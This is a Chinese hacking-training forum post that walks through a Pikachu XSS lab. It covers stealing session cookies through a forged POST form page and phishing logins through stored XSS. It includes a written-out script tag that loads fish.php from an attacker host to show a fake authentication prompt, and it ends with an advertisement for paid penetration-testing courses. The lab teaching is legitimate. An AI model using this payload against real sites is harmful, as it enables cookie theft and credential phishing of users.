(六)反射型(POST)XSS利用:cookie获取

[复制链接]
发表于 2025-11-12 19:17:35 | 显示全部楼层 |阅读模式
POST请求方式:请求的数据不在URL中传输,无法直接通过URL获取

1、账号密码登录:admin/123456
截图202511121120122362.png


2、随便输入数值,提交表单
截图202511121120288456.png

3、拦截请求
截图202511121120488901.png
截图202511121121076040.png


伪造的页面代码:post.html

需要修改提交到的存在漏洞地址和 后台 pkxss 地址

截图202511121121478373.png




用户在登录状态下点击伪造的页面链接:
http://192.168.3.101/pkxss/xcookie/post.html
跳转到我们定义的页面,过程中发送cookie给攻击者

获取到的cookie

截图202511121122159698.png


页面跳转

截图202511121122268966.png


存储型XSS利用:钓鱼攻击

需要修改fish.php代码中的pkxss     

注意: PHP 的 HTTP 认证机制仅在 PHP 以 Apache 模块方式运行时才有效,因此该功能不适用于 CGI 版本(且phpstudy的nts模式下也不不能使用)

不要使用phpstudy_pro 要切换成 phpstudy找到php版本不带有nts格式的

截图202511121123305936.png


身份验证的弹窗


截图202511121123549517.png


构建代码:

<script src="http://192.168.0.234:8000/pkxss/xfish/fish.php"></script>


输入到存储型xss留言板

截图202511121124396658.png


不同的浏览器弹出的认证框是不一样的


截图202511121124502310.png



必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:21 , Processed in 0.087269 second(s), 26 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表